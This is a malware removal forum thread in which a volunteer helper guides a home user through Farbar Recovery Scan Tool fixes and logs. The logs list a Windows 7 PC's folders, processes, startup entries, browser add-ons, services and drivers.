2014-10-17 11:07 - 2013-08-05 21:51 - 00000000 ____D () C:\Users\Greg\Documents\EquiTrust
2014-10-17 09:05 - 2014-05-14 08:51 - 00000000 ____D () C:\Users\Greg\Documents\Life Ins
2014-10-16 20:19 - 2011-07-13 19:10 - 00000000 ____D () C:\Users\Greg\Documents\Advertising & Marketing
2014-10-16 17:03 - 2011-10-02 15:51 - 00002455 _____ () C:\Users\Greg\Documents\4 LEAD CO - Shortcut.lnk
2014-10-15 19:32 - 2014-02-19 17:31 - 00002102 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-10-15 17:38 - 2012-07-10 14:09 - 00000000 ____D () C:\Program Files (x86)\Java
2014-10-15 04:44 - 2013-01-20 11:23 - 00000000 ____D () C:\Users\Greg\AppData\Roaming\MotoCast
2014-10-15 03:27 - 2013-01-20 11:26 - 00000000 ____D () C:\Users\Greg\.gstreamer-0.10
2014-10-14 20:52 - 2014-04-05 14:03 - 00000000 ____D () C:\Users\Greg\Documents\001 Archive Folder
2014-10-14 18:48 - 2011-07-13 19:10 - 00000000 ____D () C:\Users\Greg\Documents\Aetna Ind Health
2014-10-14 16:30 - 2012-09-04 14:12 - 00000000 ____D () C:\Users\Greg\Documents\State Licenses
2014-10-14 13:20 - 2014-02-04 15:00 - 00003578 _____ () C:\Windows\System32\Tasks\G2MUpdateTask-S-1-5-21-3448307080-1944955064-2909665858-1000
2014-10-14 12:13 - 2012-10-09 22:24 - 00000000 ____D () C:\Users\Greg\Cars & Cycles
2014-10-14 09:45 - 2014-04-02 17:53 - 00000214 _____ () C:\Users\Greg\Desktop\LPI Policies.url
2014-10-13 16:31 - 2012-06-22 09:30 - 00000000 ____D () C:\Users\Greg\AppData\Local\Downloaded Installations
2014-10-13 15:36 - 2013-03-12 21:47 - 00000000 ____D () C:\Program Files\Microsoft Silverlight
2014-10-13 15:36 - 2013-03-12 21:47 - 00000000 ____D () C:\Program Files (x86)\Microsoft Silverlight
2014-10-13 12:47 - 2013-11-29 17:53 - 00000000 ____D () C:\Users\Greg\1 - Read
2014-10-04 09:44 - 2013-08-07 20:35 - 00003238 _____ () C:\Windows\System32\Tasks\Norton WSC Integration
2014-10-04 09:44 - 2013-08-07 20:34 - 00000000 ____D () C:\Windows\system32\Drivers\N360x64
2014-10-04 08:41 - 2013-04-05 13:46 - 00000294 _____ () C:\Users\Greg\Desktop\Go Daddy Email.url
2014-10-03 10:59 - 2013-03-09 09:57 - 00000000 ____D () C:\Users\Greg\Documents\01 Read
2014-10-03 10:02 - 2011-07-14 16:41 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-10-02 21:35 - 2012-08-16 21:57 - 00000000 ____D () C:\Users\Greg\Documents\Vacation
2014-10-02 05:52 - 2014-08-26 13:36 - 00000000 ____D () C:\Users\Greg\Food Storage
2014-09-30 20:37 - 2011-08-04 09:56 - 00000000 ____D () C:\Users\Greg\E-Books
2014-09-30 14:41 - 2014-09-05 14:22 - 00000000 ____D () C:\Users\Greg\Documents\Provident Trust
2014-09-30 12:09 - 2011-11-04 11:03 - 00000000 __SHD () C:\Users\Greg\Documents\cache
2014-09-30 11:00 - 2011-07-13 19:11 - 00000000 ____D () C:\Users\Greg\Documents\MEDICARE
2014-09-30 06:42 - 2014-05-09 15:09 - 00000000 ____D () C:\Users\Greg\Documents\Safe Money
2014-09-30 06:38 - 2011-09-29 10:02 - 00000000 ____D () C:\Users\Greg\Documents\Funeral Trusts - Legacy Safeguard & NGL
2014-09-30 06:31 - 2011-07-13 19:11 - 00000000 ____D () C:\Users\Greg\Documents\Client Contact List
2014-09-30 06:23 - 2014-01-29 14:09 - 00000000 ____D () C:\Users\Greg\Documents\APPS PENDING-14
2014-09-30 06:23 - 2013-12-09 18:31 - 00000000 ____D () C:\Users\Greg\Documents\HIX
2014-09-30 06:13 - 2012-07-20 12:34 - 00000000 ____D () C:\Users\Greg\Documents\ID Theft & Legal Shield
2014-09-26 12:43 - 2013-02-19 13:35 - 00000000 ____D () C:\Users\Greg\Documents\SOCIAL SECURITY

Files to move or delete:
====================
C:\Users\Greg\AppData\Roaming\skype.ini
C:\Users\Greg\AppData\Roaming\cache.ini

Some content of TEMP:
====================
C:\Users\Greg\AppData\Local\Temp\sqlite3.dll
C:\Users\Greg\AppData\Local\Temp\System.Data.SQLite.dll
C:\Users\Greg\AppData\Local\Temp\System.Data.SQLite24165.dll
C:\Users\Greg\AppData\Local\Temp\System.Data.SQLite55383.dll
C:\Users\Greg\AppData\Local\Temp\System.Data.SQLite87103.dll
C:\Users\Greg\AppData\Local\Temp\UNINSTALL.EXE

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-10-16 00:49

==================== End Of Log ============================

 

Attached File  Addition.txt   33.02KB   1 downloads



#5 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:10:51 PM

Posted 25 October 2014 - 11:46 AM

Hello Sue,

 

Nice to meet you. :)

 

Do you know what is this program? => Tuition Savings Calculator 12-13

 

 

Next please download the following file => and save it to the Desktop.
NOTE. It's important that both files, FRST and fixlist.txt are in the same location or the fix will not work.

Run FRST and press the Fix button just once and wait.
The tool will make a log on the Desktop (Fixlog.txt). Please post it to your reply.

 

 

Regards,

Georgi


cXfZ4wS.png


#6 sjk117

sjk117
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:03:51 PM

Posted 25 October 2014 - 09:35 PM

Attached File  Fixlog.txt   5.8KB   3 downloads

 

Yes, we know that program, but no longer need it. I deinstalled it.

Ran the fixlist file as instructed above; I had to go out, so I left it running. After 6 hours, by husband decided to check it - the green progress bar was not advancing anymore; he clicked in the header of the program window and got a message that it was not responding.

 

I got 2 home hours after that - the program icon was minimized in the Taskbar, when I tried to re-open it, it would not open, and I could not close it, either. I used Task Manager to check it, it said it was not responding, so I ended it. There was a fixlog file on the desktop, that is attached. I shut down the infected pc.

 

Also, I have noticed every time we shut down that computer, it displays a "Windows Update" message - and when it starts up again, it says it is applying updates. This machine has been disconnected from the internet for 3 days, so I don't see how it could have a windows update every time we power it down....

 

Awaiting next instruction.

Sue


Edited by sjk117, 25 October 2014 - 09:37 PM.


#7 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:10:51 PM

Posted 26 October 2014 - 04:09 AM

Hello,

 

The fix seems successful despite the error message. :)

Please restart the computer and run a new scan with Farbar Recovery Scan Tool (make sure that Addition.txt is checked before you press the Scan button) and then please post both logs in your next reply.

 

As for Windows Updates...the updates may have beed downloaded but not installed yet it Download updates but let me choose whether to install them is selected in the Windows Update settings.

 

http://windows.microsoft.com/en-us/windows/change-windows-update-installation-notification#1TC=windows-7

 

 

 

Regards,

Georgi


cXfZ4wS.png


#8 sjk117

sjk117
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:03:51 PM

Posted 26 October 2014 - 07:10 AM

Attached File  Addition.txt   32.99KB   1 downloads

OK, ran FRST, Logs below and attached. Ok to reconnect computer to internet?

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 25-10-2014
Ran by Greg (administrator) on KIBMAIN on 26-10-2014 08:01:19
Running from C:\Users\Greg\Desktop
Loaded Profile: Greg (Available profiles: Greg)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 10
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Small Business\Business Contact Manager\BcmSqlStartupSvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Nero AG) C:\Program Files (x86)\Motorola Media Link\Lite\NServiceEntry.exe
() C:\Program Files\Siber Systems\GoodSync\Gs-Server.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae-svc.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
(Symantec Corporation) C:\Program Files (x86)\Norton One\Engine\3.2.2.12\ccsvchst.exe
(Motorola Mobility LLC) C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe
(Symantec Corporation) C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\n360.exe
(Motorola) C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe
(Memeo) C:\Program Files (x86)\Seagate\Seagate Dashboard\SeagateDashboardService.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft SQL Server\90\Shared\sqlbrowser.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Symantec Corporation) C:\Program Files (x86)\Norton One\Engine\3.2.2.12\ccsvchst.exe
(Motorola Mobility LLC) C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperAgent.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
(Symantec Corporation) C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\n360.exe
(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe
(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe
(SlimWare Utilities, Inc.) C:\Program Files (x86)\DriverUpdate\DriverUpdate.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae.exe
(Memeo) C:\Program Files (x86)\Seagate\Seagate Dashboard\MemeoDashboard.exe
(Axentra Corporation) C:\Program Files (x86)\Seagate\Seagate Dashboard\HipServAgent\HipServAgent.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13662936 2013-11-28] (Realtek Semiconductor)
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [89184 2012-11-05] (Microsoft Corporation)
HKLM-x32\...\Run: [Seagate Dashboard] => C:\Program Files (x86)\Seagate\Seagate Dashboard\MemeoLauncher.exe [79112 2011-06-01] ()
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-04-21] (Apple Inc.)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [49208 2011-10-28] (Hewlett-Packard)
HKLM-x32\...\Run: [BFHP] => C:\Program Files (x86)\Common Files\BeFrugal.com\Toolbar\BFHP.exe
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [271744 2014-09-26] (Oracle Corporation)
HKLM-x32\...\Run: [Malwarebytes Anti-Exploit] => C:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae.exe [440632 2014-08-29] (Malwarebytes Corporation)
HKU\S-1-5-21-3448307080-1944955064-2909665858-1000\...\MountPoints2: {7304c3fd-60a8-11e2-a79a-4061869b0540} - I:\MotoCastSetup.exe -a
HKU\S-1-5-18\...\Run: [Norton Download Manager{N360P204040-SHPD-FSD33017}] => C:\Program Files (x86)\Norton One\Engine\3.2.0.19\ccSvcHst.exe /m
ShellIconOverlayIdentifiers: [OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files (x86)\Norton 360 Premier Edition\Engine64\21.6.0.32\buShell.dll (Symantec Corporation)
ShellIconOverlayIdentifiers: [OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files (x86)\Norton 360 Premier Edition\Engine64\21.6.0.32\buShell.dll (Symantec Corporation)
ShellIconOverlayIdentifiers: [OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files (x86)\Norton 360 Premier Edition\Engine64\21.6.0.32\buShell.dll (Symantec Corporation)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.yahoo.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://www.yahoo.com/?fr=befhp&type=iehp-3.13-1406
SearchScopes: HKCU - 68B8CF96730C4D55A37F7E95660E8E82 URL = https://search.yahoo.com/search?p={searchTerms}&fr=chr-gl-gen1
SearchScopes: HKCU - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}
SearchScopes: HKCU - {AFDBDDAA-5D3F-42EE-B79C-185A7020515B} URL =
BHO: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton 360 Premier Edition\Engine64\21.6.0.32\coIEPlg.dll (Symantec Corporation)
BHO: RoboForm Toolbar Helper -> {724d43a9-0d85-11d4-9908-00400523e39a} -> C:\Program Files (x86)\Siber Systems\AI RoboForm\RoboForm-x64.dll (Siber Systems Inc.)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> No File
BHO-x32: No Name -> {02478D38-C3F9-4efb-9B51-7695ECA05670} -> No File
BHO-x32: RealPlayer Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\IE\rpbrowserrecordplugin.dll (RealPlayer)
BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\coIEPlg.dll (Symantec Corporation)
BHO-x32: Norton Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\IPS\IPSBHO.DLL (Symantec Corporation)
BHO-x32: RoboForm Toolbar Helper -> {724d43a9-0d85-11d4-9908-00400523e39a} -> C:\Program Files (x86)\Siber Systems\AI RoboForm\roboform.dll (Siber Systems Inc.)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Toolbar: HKLM - &RoboForm Toolbar - {724d43a0-0d85-11d4-9908-00400523e39a} - C:\Program Files (x86)\Siber Systems\AI RoboForm\RoboForm-x64.dll (Siber Systems Inc.)
Toolbar: HKLM - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton 360 Premier Edition\Engine64\21.6.0.32\coIEPlg.dll (Symantec Corporation)
Toolbar: HKLM-x32 - &RoboForm Toolbar - {724d43a0-0d85-11d4-9908-00400523e39a} - C:\Program Files (x86)\Siber Systems\AI RoboForm\roboform.dll (Siber Systems Inc.)
Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\coIEPlg.dll (Symantec Corporation)
Toolbar: HKCU - &RoboForm Toolbar - {724D43A0-0D85-11D4-9908-00400523E39A} - C:\Program Files (x86)\Siber Systems\AI RoboForm\RoboForm-x64.dll (Siber Systems Inc.)
Toolbar: HKCU - No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - No File
DPF: HKLM-x32 {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} http://appldnld.apple.com.edgesuite.net/content.info.apple.com/QuickTime/qtactivex/qtplugin.cab
DPF: HKLM-x32 {119CE688-A7E9-1941-8E10-F42990BBA4C4} https://fiserv.assurity.com/reports/control/ASRrptview.cab
DPF: HKLM-x32 {166B1BCA-3F9C-11CF-8075-444553540000} http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
DPF: HKLM-x32 {E06E2E99-0AA1-11D4-ABA6-0060082AA75C} https://turborater.webex.com/client/WBXclient-T28L10NSP8EP1-15699/nbr/ieatgpc1.cab
Tcpip\Parameters: [DhcpNameServer] 216.144.187.199 24.229.54.212 204.186.80.229

FireFox:
========
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1167637.dll (Adobe Systems, Inc.)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @java.com/DTPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @real.com/nppl3260;version=15.0.4.53 -> C:\Program Files (x86)\Real\RealPlayer\Netscape6\nppl3260.dll (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprjplug;version=15.0.4.53 -> C:\Program Files (x86)\Real\RealPlayer\Netscape6\nprjplug.dll (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprpchromebrowserrecordext;version=15.0.4.53 -> C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\MozillaPlugins\nprpchromebrowserrecordext.dll (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprphtml5videoshim;version=15.0.4.53 -> C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\MozillaPlugins\nprphtml5videoshim.dll (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprpplugin;version=15.0.4.53 -> C:\Program Files (x86)\Real\RealPlayer\Netscape6\nprpplugin.dll (RealPlayer)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @citrixonline.com/appdetectorplugin -> C:\Users\Greg\AppData\Local\Citrix\Plugins\79\npappdetector.dll (Citrix Online)
FF Extension: Word Layers - C:\Program Files (x86)\Mozilla Firefox\extensions\ugnraew@jqhljqmpngx.net [2013-10-16]
FF Extension: No Name - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBA} [2012-07-10]
FF Extension: No Name - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0035-ABCDEFFEDCBA} [2012-08-31]
FF HKLM-x32\...\Firefox\Extensions: [{97E22097-9A2F-45b1-8DAF-36AD648C7EF4}] - C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\Firefox\Ext
FF Extension: No Name - C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\Firefox\Ext [2012-05-21]
FF HKLM-x32\...\Firefox\Extensions: [{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.1.0.18\coFFPlgn
FF Extension: Norton Toolbar - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.1.0.18\coFFPlgn [2014-10-26]
FF HKLM-x32\...\Firefox\Extensions: [{BBDA0591-3099-440a-AA10-41764D9DB4DB}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.1.0.18\IPSFF
FF Extension: Norton Vulnerability Protection - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.1.0.18\IPSFF [2014-02-17]

Chrome:
=======
CHR HomePage: Default -> https://www.google.com/
CHR Profile: C:\Users\Greg\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Greg\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-06-12]
CHR Extension: (Norton Identity Safe) - C:\Users\Greg\AppData\Local\Google\Chrome\User Data\Default\Extensions\iikflkcanblccfahdhdonehdalibjnif [2014-08-21]
CHR Extension: (RoboForm Lite Password Manager) - C:\Users\Greg\AppData\Local\Google\Chrome\User Data\Default\Extensions\kidhjpmgjfbkmcfpfakmdddddgfbhahj [2014-08-04]
CHR Extension: (Norton Security Toolbar) - C:\Users\Greg\AppData\Local\Google\Chrome\User Data\Default\Extensions\mkfokfffehpeedafpekjeddnmnjhmcmk [2014-02-19]
CHR Extension: (Google Wallet) - C:\Users\Greg\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-02-19]
CHR HKLM\...\Chrome\Extension: [mkfokfffehpeedafpekjeddnmnjhmcmk] - C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\Exts\Chrome.crx [2014-10-04]
CHR HKLM-x32\...\Chrome\Extension: [jfmjfhklogoienhpfnppmbcbjfjnkonk] - C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\Chrome\Ext\rphtml5video.crx [2014-10-04]
CHR HKLM-x32\...\Chrome\Extension: [mkfokfffehpeedafpekjeddnmnjhmcmk] - C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\Exts\Chrome.crx [2014-10-04]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 GsServer; C:\Program Files\Siber Systems\GoodSync\Gs-Server.exe [8574096 2014-03-30] ()
R2 MbaeSvc; C:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae-svc.exe [441144 2014-08-29] (Malwarebytes Corporation)
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-10-01] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [968504 2014-10-01] (Malwarebytes Corporation)
R2 MCLIENT; C:\Program Files (x86)\Norton One\Engine\3.2.2.12\ccSvcHst.exe [143928 2012-12-04] (Symantec Corporation)
R2 Motorola Device Manager; C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe [137528 2013-11-15] (Motorola Mobility LLC)
S3 MSSQL$MSSMLBIZ; c:\Program Files (x86)\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe [29293408 2010-12-10] (Microsoft Corporation)
R2 N360; C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\N360.exe [265040 2014-09-21] (Symantec Corporation)
R2 PST Service; C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe [65657 2011-09-02] (Motorola) [File not signed]
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [289496 2013-11-28] (Realtek Semiconductor)
S3 B-Service; No ImagePath

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S1 A2DDA; No ImagePath
S0 amdkmafd; C:\Windows\System32\DRIVERS\amdkmafd.sys [21160 2013-10-16] (Advanced Micro Devices, Inc.)
R0 amdkmpfd; C:\Windows\System32\DRIVERS\amdkmpfd.sys [36096 2013-10-16] (Advanced Micro Devices, Inc.)
R1 BHDrvx64; C:\Program Files (x86)\Norton 360 Premier Edition\NortonData\21.1.0.18\Definitions\BASHDefs\20141016.001\BHDrvx64.sys [1587416 2014-10-03] (Symantec Corporation)
R1 ccSet_MCLIENT; C:\Windows\system32\drivers\MCLIENTx64\0302020.00C\ccSetx64.sys [168096 2012-10-03] (Symantec Corporation)
R1 ccSet_N360; C:\Windows\system32\drivers\N360x64\1506000.020\ccSetx64.sys [162392 2013-09-25] (Symantec Corporation)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [487216 2014-09-09] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [142640 2014-09-09] (Symantec Corporation)
R1 ESProtectionDriver; C:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae64.sys [63000 2014-08-30] ()
S3 hitmanpro37; C:\Windows\system32\drivers\hitmanpro37.sys [32512 2013-11-04] ()
R0 iaStorF; C:\Windows\System32\DRIVERS\iaStorF.sys [28008 2013-10-23] (Intel Corporation)
R1 IDSVia64; C:\Program Files (x86)\Norton 360 Premier Edition\NortonData\21.1.0.18\Definitions\IPSDefs\20141021.001\IDSvia64.sys [633560 2014-08-29] (Symantec Corporation)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2014-10-01] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [129752 2014-10-26] (Malwarebytes Corporation)
R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2014-10-01] (Malwarebytes Corporation)
R3 NAVENG; C:\Program Files (x86)\Norton 360 Premier Edition\NortonData\21.1.0.18\Definitions\VirusDefs\20141022.003\ENG64.SYS [129752 2014-08-21] (Symantec Corporation)
R3 NAVEX15; C:\Program Files (x86)\Norton 360 Premier Edition\NortonData\21.1.0.18\Definitions\VirusDefs\20141022.003\EX64.SYS [2137304 2014-08-21] (Symantec Corporation)
S3 RdpVideoMiniport; No ImagePath
